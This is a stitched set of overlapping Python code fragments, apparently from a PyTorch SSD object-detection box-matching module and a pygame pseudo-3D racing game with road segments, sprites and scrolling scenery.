matched_targets: Tensor, shape = (batch, default box num, 4+class_num)", "assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices],", "for returned indicator batch_num: (Required) int, batch size :return: pos_indicator:", "overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0,", "(cx, cy, w, h) :param kwargs: threshold: (Optional) float, threshold", "999) pos_ind = best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b],", "matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is (batch*object", "> threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]", "shape = (batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0)", "'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] - 4 -", "pos_ind = best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b]", "default box num, 4+class_num) including background \"\"\" threshold = kwargs.pop('threshold',", "neg_ind, -1] = 1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes,", "0 for b, target in enumerate(targets): targets_loc, targets_conf = target[:,", "pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind =", "(object num, default box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\"", "0 gt_conf[b, neg_ind, -1] = 1 \"\"\" # get maximum", "+ class_num), device=device) # matching for each batch index =", "dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 + 8 + class_num), device=device)", "(batch_num, dboxes_num, 4 + 8 + class_num), device=device) # matching", "flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0 matched_targets[b,", "overlaps_per_dbox > threshold # assign targets matched_targets[b, :, :4], matched_targets[b,", "overlap values for each object # shape = (batch num,", "batch_num: (Required) int, batch size :return: pos_indicator: Bool Tensor, shape", "neg_ind] = 0 gt_conf[b, neg_ind, -1] = 1 \"\"\" #", "for each object # shape = (batch num, object num)", "indicator batch_num: (Required) int, batch size :return: pos_indicator: Bool Tensor,", "matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices],", "....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param", ":param dboxes: shape is (default boxes num, 4) IMPORTANT: Note", "pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num,", "8 + class_num), device=device) # matching for each batch index", "background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device", "dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4 + 8 +", "b, target in enumerate(targets): targets_loc, targets_conf = target[:, :4], target[:,", "= torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] = 0 matched_targets[b, neg_ind, -1]", "num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices):", "box # shape = (batch num, dboxes num) overlaps_per_dbox, object_indices", 
"1+4+class_labels) :param dboxes: shape is (default boxes num, 4) IMPORTANT:", "int, batch size :return: pos_indicator: Bool Tensor, shape = (batch,", "overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0 pos_ind = overlaps_per_dbox", "obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0 pos_ind", ":4], target[:, 4:] # overlaps' shape = (object num, default", "index = 0 for b, target in enumerate(targets): targets_loc, targets_conf", "num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices = object_indices.long()", "overlaps.max(dim=0) # object_indices = object_indices.long() # for fancy indexing #", "float, threshold for returned indicator batch_num: (Required) int, batch size", "targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape", "4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes num, 4) IMPORTANT:", "(batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices =", "for fancy indexing # get maximum overlap values for each", "'box number per image' and 'localization=(cx, cy, w, h)' class_num", "# create returned empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num),", "neg_ind, 4:] = 0 matched_targets[b, neg_ind, -1] = 1 return", "box num). this represents whether each default box is object", "\"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device =", "dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind", "is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape is (default boxes", "= overlaps_per_dbox > threshold # assign targets matched_targets[b, :, :4],", "= overlaps.max(dim=0) # object_indices = object_indices.long() # for fancy indexing", "= (batch, default box num). this represents whether each default", "number per image' and 'localization=(cx, cy, w, h)' class_num =", "matched_targets[b, neg_ind, -1] = 1 return pos_indicator, matched_targets def matching_strategy_quads(targets,", "target[:, 4:12], target[:, 12:] # overlaps' shape = (object num,", "convert centered coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes) #", "= 1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\"", "= kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device = dboxes.device dboxes_num", "pos_indicator: Bool Tensor, shape = (batch, default box num). 
this", "4:] # overlaps' shape = (object num, default box num)", ":return: pos_indicator: Bool Tensor, shape = (batch, default box num).", "enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox", "= overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind", "dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold +", ":, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] =", "maximum overlap value for each default box # shape =", "object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind in", "num, 4) IMPORTANT: Note that means (cx, cy, w, h)", "4+class_num) including background \"\"\" threshold = kwargs.pop('threshold', 0.5) batch_num =", "num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default boxes num, 4)", "Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape is", "matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is (batch*object", "# get maximum overlap value for each default box #", "threshold + 1)# ensure N!=0 pos_ind = overlaps_per_dbox > threshold", "num, object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind", "\"\"\" # get maximum overlap value for each default box", "4:] = 0 matched_targets[b, neg_ind, -1] = 1 return pos_indicator,", "= (object num, default box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())", "b, target in enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4],", "# object_indices = object_indices.long() # for fancy indexing # get", "gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind]", "best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox],", "threshold # assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:]", "set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] =", "threshold = kwargs.pop('threshold', 0.5) batch_num = kwargs.pop('batch_num') device = dboxes.device", "= torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num),", "overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices = object_indices.long() # for", "# convert centered coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes)", "overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy indexing # get", "# for fancy indexing # get maximum overlap values for", "= torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0 matched_targets[b, neg_ind, -1]", ":param kwargs: threshold: (Optional) float, threshold for returned indicator batch_num:", "fancy indexing # get maximum overlap values for each object", "for each default box # shape = (batch num, dboxes", "torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1] = 1", "each default box # shape = (batch num, dboxes num)", "= object_indices.long() # for fancy indexing # get maximum overlap", "targets_conf[best_object_ind_per_dbox] neg_ind = 
torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind,", "targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:] #", "dboxes_num, 4 + 8 + class_num), device=device) # matching for", "(batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices", "- 4 # convert centered coordinated to minmax coordinates dboxes_mm", ":, 4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices]", "+ 8 + class_num), device=device) # matching for each batch", "for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices,", "targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b,", "= 0 matched_targets[b, neg_ind, -1] = 1 return pos_indicator, matched_targets", "neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 12:] = 0 matched_targets[b, neg_ind,", "pos_ind = overlaps_per_dbox > threshold # assign targets matched_targets[b, :,", "= obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0", "kwargs: threshold: (Optional) float, threshold for returned indicator batch_num: (Required)", "device = dboxes.device dboxes_num = dboxes.shape[0] # minus 'box number", "= 0 for b, target in enumerate(targets): targets_loc, targets_conf =", "0 for b, target in enumerate(targets): targets_loc, targets_quad, targets_conf =", "overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure N!=0 pos_ind =", "0.5) batch_num = kwargs.pop('batch_num') device = dboxes.device dboxes_num = dboxes.shape[0]", "boxes num, 4) IMPORTANT: Note that means (cx, cy, w,", "4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background", "shape is (default boxes num, 4) IMPORTANT: Note that means", "batch index = 0 for b, target in enumerate(targets): targets_loc,", "#object_indices = object_indices.long() # for fancy indexing # get maximum", "\"\"\" :param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels) :param", "= targets[0].shape[1] - 4 # convert centered coordinated to minmax", "is object or background. 
matched_targets: Tensor, shape = (batch, default", "overlaps' shape = (object num, default box num) overlaps =", "threshold for returned indicator batch_num: (Required) int, batch size :return:", "= overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind", "1 \"\"\" # get maximum overlap value for each default", "device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device) # matching", "class_num = targets[0].shape[1] - 4 - 8 # convert centered", ":, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind", "(batch num, object num) overlaps_per_object, dbox_indices = overlaps.max(dim=1) for obj_ind,", "= pos_ind # set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b,", "indexing # get maximum overlap values for each object #", "object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1) # ensure", "assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :,", "4) IMPORTANT: Note that means (cx, cy, w, h) :param", "and 'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] - 4", "centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor,", "best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999) pos_ind = best_overlap_per_dbox >", "in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)#", "= overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy indexing #", "centered coordinated to minmax coordinates dboxes_mm = centroids2corners(dboxes) # create", "h)' class_num = targets[0].shape[1] - 4 # convert centered coordinated", "set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] =", "value for each default box # shape = (batch num,", "background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind, 4:] = 0", "best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind", "object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)# ensure N!=0", "best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind,", "# get maximum overlap values for each object # shape", "enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:,", "8 # convert centered coordinated to minmax coordinates dboxes_mm =", "= \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set", ":4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind", "= (batch num, dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices", "'localization=(cx, cy, w, h)' class_num = targets[0].shape[1] - 4 #", "overlap value for each default box # shape = (batch", "box is object or background. 
matched_targets: Tensor, shape = (batch,", "matched_targets[b, :, 12:] = \\ targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices] pos_indicator[b] =", "= overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind in", "shape = (batch, default box num). this represents whether each", "= targets[0].shape[1] - 4 - 8 # convert centered coordinated", "= centroids2corners(dboxes) # create returned empty Tensor pos_indicator, matched_targets =", "shape is (batch*object num(batch), 1+4+class_labels) :param dboxes: shape is (default", "empty Tensor pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num,", "= 0 for b, target in enumerate(targets): targets_loc, targets_quad, targets_conf", "pos_indicator[b] = pos_ind # set background flag neg_ind = torch.logical_not(pos_ind)", "targets[0].shape[1] - 4 # convert centered coordinated to minmax coordinates", "= dboxes.shape[0] # minus 'box number per image' and 'localization=(cx,", "dbox_indices = overlaps.max(dim=1) for obj_ind, dbox_ind in enumerate(dbox_indices): object_indices[dbox_ind] =", "values for each object # shape = (batch num, object", "def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param targets: Tensor, shape is", "class_num = targets[0].shape[1] - 4 # convert centered coordinated to", "# ensure N!=0 pos_ind = overlaps_per_dbox > threshold # assign", "= best_overlap_per_dbox > threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] =", "size :return: pos_indicator: Bool Tensor, shape = (batch, default box", "targets matched_targets[b, :, :4], matched_targets[b, :, 4:] = targets_loc[object_indices], targets_conf[object_indices]", "\"\"\" best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for", "1 return pos_indicator, matched_targets def matching_strategy_quads(targets, dboxes, **kwargs): \"\"\" :param", "= target[:, :4], target[:, 4:12], target[:, 12:] # overlaps' shape", "overlaps.max(dim=1) best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0) for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):", "index = 0 for b, target in enumerate(targets): targets_loc, targets_quad,", "neg_ind = torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1]", "matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), torch.empty( (batch_num, dboxes_num, 4", "matching for each batch index = 0 for b, target", "in enumerate(targets): targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12],", "class_num), device=device) # matching for each batch index = 0", "neg_ind, -1] = 1 \"\"\" # get maximum overlap value", "object or background. 
matched_targets: Tensor, shape = (batch, default box", "object_indices = overlaps.max(dim=0) #object_indices = object_indices.long() # for fancy indexing", ":, 4:] = targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set", "target[:, 4:] # overlaps' shape = (object num, default box", "shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels) :param dboxes: shape is (default", "cy, w, h)' class_num = targets[0].shape[1] - 4 - 8", "targets_conf = target[:, :4], target[:, 4:12], target[:, 12:] # overlaps'", "# minus 'box number per image' and 'localization=(cx, cy, w,", "(Required) int, batch size :return: pos_indicator: Bool Tensor, shape =", "ensure N!=0 pos_ind = overlaps_per_dbox > threshold # assign targets", "= pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind = torch.logical_not(pos_ind)", ":, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \\", "= targets_loc[object_indices], targets_conf[object_indices] pos_indicator[b] = pos_ind # set background flag", "w, h) :param kwargs: threshold: (Optional) float, threshold for returned", "dboxes.device dboxes_num = dboxes.shape[0] # minus 'box number per image'", "# shape = (batch num, object num) overlaps_per_object, dbox_indices =", "dboxes: shape is (default boxes num, 4) IMPORTANT: Note that", "= torch.logical_not(pos_ind) gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1] =", "num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) # object_indices = object_indices.long() #", "threshold pos_indicator[b] = pos_ind gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox] neg_ind", "+ 1)# ensure N!=0 pos_ind = overlaps_per_dbox > threshold #", "shape = (batch, default box num, 4+class_num) including background \"\"\"", "dboxes_num), device=device, dtype=torch.bool), torch.empty((batch_num, dboxes_num, 4 + class_num), device=device) #", "each object # shape = (batch num, object num) overlaps_per_object,", "pos_ind # set background flag neg_ind = torch.logical_not(pos_ind) matched_targets[b, neg_ind,", "> threshold # assign targets matched_targets[b, :, :4], matched_targets[b, :,", "= kwargs.pop('batch_num') device = dboxes.device dboxes_num = dboxes.shape[0] # minus", "dboxes num) overlaps_per_dbox, object_indices = overlaps.max(dim=0) #object_indices = object_indices.long() #", ":4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \\ targets_loc[object_indices],", "target[:, 12:] # overlaps' shape = (object num, default box", "gt_conf[b, neg_ind] = 0 gt_conf[b, neg_ind, -1] = 1 \"\"\"", "targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:]", "**kwargs): \"\"\" :param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels)", "in enumerate(dbox_indices): object_indices[dbox_ind] = obj_ind overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)", "per image' and 'localization=(cx, cy, w, h)' class_num = targets[0].shape[1]", "from ....data.utils.boxes import centroids2corners, iou def matching_strategy(targets, dboxes, **kwargs): \"\"\"", "default box num) overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone()) \"\"\" best_overlap_per_object, best_dbox_ind_per_object", "# assign targets matched_targets[b, :, :4], matched_targets[b, :, 4:] =", "for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object): best_object_ind_per_dbox[dbox_ind] = object_ind best_overlap_per_dbox.index_fill_(0, 
def matching_strategy(targets, dboxes, **kwargs):
    """
    :param targets: Tensor, shape is (batch*object num(batch), 1+4+class_labels)
    :param dboxes: shape is (default boxes num, 4)
        IMPORTANT: Note that means (cx, cy, w, h)
    :param kwargs:
        threshold: (Optional) float, threshold for returned indicator
        batch_num: (Required) int, batch size
    :return:
        pos_indicator: Bool Tensor, shape = (batch, default box num).
            this represents whether each default box is object or background.
        matched_targets: Tensor, shape = (batch, default box num, 4+class_num) including background
    """
    threshold = kwargs.pop('threshold', 0.5)
    batch_num = kwargs.pop('batch_num')
    device = dboxes.device

    dboxes_num = dboxes.shape[0]
    # minus 'box number per image' and 'localization=(cx, cy, w, h)'
    class_num = targets[0].shape[1] - 4

    # convert centered coordinates to minmax coordinates
    dboxes_mm = centroids2corners(dboxes)

    # create returned empty Tensor
    pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), \
                                     torch.empty((batch_num, dboxes_num, 4 + class_num), device=device)

    # matching for each batch
    index = 0
    for b, target in enumerate(targets):
        targets_loc, targets_conf = target[:, :4], target[:, 4:]

        # overlaps' shape = (object num, default box num)
        overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())

        """
        best_overlap_per_object, best_dbox_ind_per_object = overlaps.max(dim=1)
        best_overlap_per_dbox, best_object_ind_per_dbox = overlaps.max(dim=0)
        for object_ind, dbox_ind in enumerate(best_dbox_ind_per_object):
            best_object_ind_per_dbox[dbox_ind] = object_ind
        best_overlap_per_dbox.index_fill_(0, best_dbox_ind_per_object, 999)

        pos_ind = best_overlap_per_dbox > threshold
        pos_indicator[b] = pos_ind
        gt_loc[b], gt_conf[b] = targets[best_object_ind_per_dbox], targets_conf[best_object_ind_per_dbox]

        neg_ind = torch.logical_not(pos_ind)
        gt_conf[b, neg_ind] = 0
        gt_conf[b, neg_ind, -1] = 1
        """
        # get maximum overlap value for each default box
        # shape = (batch num, dboxes num)
        overlaps_per_dbox, object_indices = overlaps.max(dim=0)
        #object_indices = object_indices.long() # for fancy indexing

        # get maximum overlap values for each object
        # shape = (batch num, object num)
        overlaps_per_object, dbox_indices = overlaps.max(dim=1)
        for obj_ind, dbox_ind in enumerate(dbox_indices):
            object_indices[dbox_ind] = obj_ind
        overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)  # ensure N!=0

        pos_ind = overlaps_per_dbox > threshold

        # assign targets
        matched_targets[b, :, :4], matched_targets[b, :, 4:] = \
            targets_loc[object_indices], targets_conf[object_indices]
        pos_indicator[b] = pos_ind

        # set background flag
        neg_ind = torch.logical_not(pos_ind)
        matched_targets[b, neg_ind, 4:] = 0
        matched_targets[b, neg_ind, -1] = 1

    return pos_indicator, matched_targets


def matching_strategy_quads(targets, dboxes, **kwargs):
    """
    :param targets: Tensor, shape is (batch*object num(batch), 4=(cx,cy,w,h)+8=(x1,y1,x2,y2,...)+class_labels)
    :param dboxes: shape is (default boxes num, 4)
        IMPORTANT: Note that means (cx, cy, w, h)
    :param kwargs:
        threshold: (Optional) float, threshold for returned indicator
        batch_num: (Required) int, batch size
    :return:
        pos_indicator: Bool Tensor, shape = (batch, default box num).
            this represents whether each default box is object or background.
        matched_targets: Tensor, shape = (batch, default box num, 4+8+class_num) including background
    """
    threshold = kwargs.pop('threshold', 0.5)
    batch_num = kwargs.pop('batch_num')
    device = dboxes.device

    dboxes_num = dboxes.shape[0]
    # minus 'box number per image' and 'localization=(cx, cy, w, h)'
    class_num = targets[0].shape[1] - 4 - 8

    # convert centered coordinates to minmax coordinates
    dboxes_mm = centroids2corners(dboxes)

    # create returned empty Tensor
    pos_indicator, matched_targets = torch.empty((batch_num, dboxes_num), device=device, dtype=torch.bool), \
                                     torch.empty((batch_num, dboxes_num, 4 + 8 + class_num), device=device)

    # matching for each batch
    for b, target in enumerate(targets):
        targets_loc, targets_quad, targets_conf = target[:, :4], target[:, 4:12], target[:, 12:]

        # overlaps' shape = (object num, default box num)
        overlaps = iou(centroids2corners(targets_loc), dboxes_mm.clone())

        # get maximum overlap value for each default box
        overlaps_per_dbox, object_indices = overlaps.max(dim=0)
        # get maximum overlap values for each object
        overlaps_per_object, dbox_indices = overlaps.max(dim=1)
        for obj_ind, dbox_ind in enumerate(dbox_indices):
            object_indices[dbox_ind] = obj_ind
        overlaps_per_dbox.index_fill_(0, dbox_indices, threshold + 1)  # ensure N!=0

        pos_ind = overlaps_per_dbox > threshold

        # assign targets
        matched_targets[b, :, :4], matched_targets[b, :, 4:12], matched_targets[b, :, 12:] = \
            targets_loc[object_indices], targets_quad[object_indices], targets_conf[object_indices]
        pos_indicator[b] = pos_ind

        # set background flag
        neg_ind = torch.logical_not(pos_ind)
        matched_targets[b, neg_ind, 12:] = 0
        matched_targets[b, neg_ind, -1] = 1

    return pos_indicator, matched_targets
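# --- Editor's sketch (not part of the original module): a minimal smoke test
# --- for matching_strategy(). It assumes this module's own iou() and
# --- centroids2corners() are defined above; shapes follow the docstring.
if __name__ == '__main__':
    import torch
    torch.manual_seed(0)
    dboxes = torch.tensor([[0.25, 0.25, 0.5, 0.5],
                           [0.75, 0.75, 0.5, 0.5]])  # (cx, cy, w, h)
    # one image, one ground-truth box; conf is a one-hot over 3 classes
    target = torch.tensor([[0.25, 0.25, 0.4, 0.4, 1., 0., 0.]])
    pos_indicator, matched_targets = matching_strategy([target], dboxes, batch_num=1)
    print(pos_indicator.shape, matched_targets.shape)  # (1, 2) and (1, 2, 7)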
[ "-= sky.rect.width * 2 for hill in self.bg_hills: hill.rect.left +=", "Exception as e: #print '-' * 60 pass def rd_sprts_render(self,", "220 }, 'COLUMN': { 'x': 995, 'y': 5, 'w': 200,", "{ 'x': 5, 'y': 5, 'w': 215, 'h': 540 },", "self.d, zc1) xsr2 = self.xp_to_xs(xpr2, self.w) xpr3 = self.xc_to_xp(xcr3, self.d,", "[x4, d-y4], [x1, d-y1]] c = utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c,", "draw a circle\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i", "int(math.floor(pos / self.seg_len)) #i = int(math.ceil(pos / self.seg_len)) seg_n =", "0 return obj = sprt.get('obj') if not obj: # None", "= yc * (d / zc) return yp def xp_to_xs(self,", "a = float(curve) / rad #a *= 10.0 #print a", "/ self.road.speed_max self.spd.progress(spdc) class FPSceneA(pygm.PyGMScene): def __init__(self, *args, **kwargs): super(FPSceneA,", "the cloud for sky in self.bg_sky: sky.rect.left -= 1#self.sky_speed if", "num segments 'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD':", "{'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size,", "e_keys_dn, e_keys_up): if 0 in e_keys_dn: self.player_go = 1 elif", "self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = - (b_curve * b_percent) x_curve =", "0 # 0:- 1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn =", "'y': 897, 'w': 298, 'h': 190 }, 'BOULDER2': { 'x':", "* 2 class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs, rad, *args,", "num, num, 0, 0) self.add_road(num, num, num, 0, height/2.0) self.add_road(num,", "= 240 self.road.rect.left = 0 self.disp_add(self.road) self.disp_add(self.car) self.rdmap = FPSptRoadMap((480,", "= (len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n =", "**kwargs): #self.fill(self.c) d = 2 n = self.h / d", "''' # grass self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4,", "0: hill.rect.left += hill.rect.width * 2 if hill.rect.left - hill.rect.width", "self.c, rct) class FPSptRdSprts(pygm.SptImg): def __init__(self, img_file, *args, **kwargs): super(FPSptRdSprts,", "add_road(self, enter, hold, leave, curve, yw=0.0): #print enter, hold, leave,", "= self.xp_to_xs(xpl2, self.w) xpl3 = self.xc_to_xp(xcl3, self.d, zc2) xsl3 =", "== 2: sprt_at = 580 elif x_i == 3: sprt_at", "FP_COLORS['START_Y'] for i in range(n): self.segments[i]['color'] = FP_COLORS['START_Y'] def rd_sprts_init_rand(self,", "self.xc = 0.0 self.yc = 0.0 self.zc = 0.0 ##", "{} for k, v in seg.items(): if k not in", "sky.rect.width * 2 if sky.rect.left - sky.rect.width > 0: sky.rect.left", "ys4, xs3, ys3, seg['color']['road']) if 1:#i % 2 == 1:", "check score once for a segment seg_i = self.player_seg['index'] if", "events, *args, **kwargs): #return events r_events = [] for event", "= True self.game_score = -1.0 def check_score(self): # make sure", "self.w) yp1 = self.yc_to_yp(yc, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h)", "self.util_ease_out(start_y, end_y, float(n)/total)) for n in range(hold): self.rd_seg_add(curve, self.util_ease_out(start_y, end_y,", "480, 'w': 80, 'h': 41 }, 'PLAYER_RIGHT': { 'x': 995,", "300, 'h': 170 }, 'BILLBOARD06': { 'x': 488, 'y': 555,", "p < 0.8: # curve = 0.0 # yw =", "= self.yp_to_ys(yp3, self.h) ys4 = ys3 self.render_polygon(None, 0, ys1, self.w,", "zc1) xsr1 = self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1)", "NOTE: not used now !! 
